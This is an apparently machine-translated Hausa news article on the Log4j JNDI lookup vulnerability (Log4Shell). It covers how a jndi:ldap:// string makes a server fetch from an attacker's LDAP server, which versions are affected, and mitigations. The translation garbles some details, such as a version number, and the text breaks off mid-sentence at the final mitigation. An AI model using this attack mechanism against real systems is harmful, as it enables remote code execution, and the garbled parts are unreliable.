Hackers suna ci gaba da yin amfani da ƙwazo mai mahimmanci a cikin Log4J

An yi ta maganganu da yawa akan yanar gizo game da raunin da ke ciki Log4J wanda ke bawa maharin damar haifar da kisa na sabani daga nesa idan kuna da ikon aika bayanai zuwa aikace-aikacen da ke amfani da ɗakin karatu na log4j don shiga taron.

Wannan harin za a iya yi ba tare da an inganta shi baMisali, ta hanyar yin amfani da shafin tantancewa wanda ke yin rajistar kurakuran tantancewa.

Wannan nakasu ya sanya kamfanoni da suka kware a harkar tsaro ta yanar gizo yin aiki a kan taron kuma ya nuna cewa yawan hare-haren da ke cin gajiyar wannan lahani na karuwa.

Membobin Gidauniyar Software na Apache sun haɓaka faci don gyara raunin kuma yana da nau'in 2.15.0, ban da gaskiyar cewa an kuma sanar da yiwuwar mafita don rage haɗarin.

Menene Apache Log4j? Yaya girman laifin?

Ga wadanda har yanzu ba su san yadda matsalar take ba, zan iya gaya muku hakan A ranar 9 ga Disamba, an gano rauni a cikin ldon yin rikodin ɗakin karatu log4j Apache.

Wannan laburaren yadu amfani a aikace-aikace ci gaban ayyukan Java/J2EE da madaidaitan Java/J2EE masu samar da mafita na software.

Shiga 4j ya ƙunshi tsarin bincike wanda za'a iya amfani dashi don tambaya ta musamman syntax a cikin wani tsari kirtani. Misali, ana iya amfani da shi don buƙatar sigogi daban-daban kamar sigar muhallin Java ta hanyar $ {java: version} da sauransu.

Sannan tantance maɓallin jndi a cikin kirtani, hanyar bincike Yi amfani da JNDI API. Ta hanyar tsoho, ana yin duk buƙatun tare da prefix java: comp / env / *; duk da haka, marubutan sun aiwatar da zaɓi don amfani da prefix na al'ada ta amfani da colon a cikin maɓalli.

Anan shine inda raunin ya ta'allaka: sijndi: ldap: // ana amfani dashi azaman maɓalli, buƙatar ta tafi zuwa takamaiman sabar LDAP. Hakanan ana iya amfani da wasu ka'idojin sadarwa kamar LDAPS, DNS, da RMI.

Don haka, uwar garken nesa wanda maharin ke sarrafawa zai iya mayar da wani abu zuwa uwar garken mara lahani, wanda zai iya haifar da aiwatar da code na sabani akan tsarin ko ɓarnar bayanan sirri.

Duk abin da mai hari zai yi shi ne ya aika da kirtani na musamman Ta hanyar hanyar da ke rubuta wannan kirtani zuwa fayil ɗin log don haka ɗakin karatu na Log4j ke sarrafa shi.

Ana iya yin wannan tare da buƙatun HTTP masu sauƙi, misali waɗanda aka aika ta fom ɗin gidan yanar gizo, filayen bayanai, da sauransu, ko tare da kowane nau'in hulɗar ta amfani da rajistar gefen uwar garke.

Tenable yana kwatanta raunin a matsayin "mafi mahimmanci kuma mafi mahimmancin raunin shekaru goma da suka gabata."

An riga an buga tabbacin ra'ayi. Wannan raunin yanzu ana amfani da shi sosai.

Tsananin raunin shine Matsakaicin 10 akan sikelin CVSS.

Ga jerin tsarin da abin ya shafa:

  • Apache Log4j sigar 2.0 zuwa 2.14.1
  • Apache Log4j nau'ikan 1.x (wanda aka daina amfani da su) wanda ke ƙarƙashin tsari na musamman.
  • Samfuran da ke amfani da sigar mai rauni ta Apache Log4j - Takaddun shaida na ƙasa na Turai suna kula da cikakken jerin samfuran da matsayin raunin su.

CERT-FR tana ba da shawarar gudanar da cikakken bincike kan rajistan ayyukan cibiyar sadarwa. Ana iya amfani da waɗannan dalilai masu zuwa don gano ƙoƙarin yin amfani da wannan raunin lokacin da aka yi amfani da su a cikin URLs ko wasu masu rubutun HTTP azaman wakilin mai amfani.

A karshe yana da kyau a ambaci hakan ana ba da shawarar sosai don amfani da sigar log2.15.0j 4 da wuri-wuri.

Koyaya, idan akwai matsalolin ƙaura zuwa wannan sigar, ana iya amfani da mafita masu zuwa na ɗan lokaci:
Don aikace-aikacen da ke amfani da nau'ikan 2.7.0 da kuma daga baya na ɗakin karatu na log4j, yana yiwuwa a kare kariya daga kowane hari ta hanyar gyaggyara tsarin abubuwan da za a shiga tare da syntax% m {nolookups} don bayanan da mai amfani zai bayar.

Wannan gyara yana buƙatar gyara fayil ɗin sanyi na log4j don samar da sabon sigar aikace-aikacen. Don haka, wannan yana buƙatar sake yin matakan tabbatar da fasaha da aiki kafin tura wannan sabon sigar.

Don aikace-aikacen da ke amfani da nau'ikan 2.10.0 da kuma daga baya na ɗakin karatu na log4j, Hakanan yana yiwuwa a kare kariya daga kowane hari ta hanyar canza ma'aunin daidaitawa log4j2.formatMsgNoLo


Kasance na farko don yin sharhi

Bar tsokaci

Your email address ba za a buga. Bukata filayen suna alama da *

*

*

  1. Wanda ke da alhakin bayanan: Miguel Ángel Gatón
  2. Manufar bayanan: Sarrafa SPAM, sarrafa sharhi.
  3. Halacci: Yarda da yarda
  4. Sadarwar bayanan: Ba za a sanar da wasu bayanan ga wasu kamfanoni ba sai ta hanyar wajibcin doka.
  5. Ajiye bayanai: Bayanin yanar gizo wanda Occentus Networks (EU) suka dauki nauyi
  6. Hakkoki: A kowane lokaci zaka iyakance, dawo da share bayanan ka.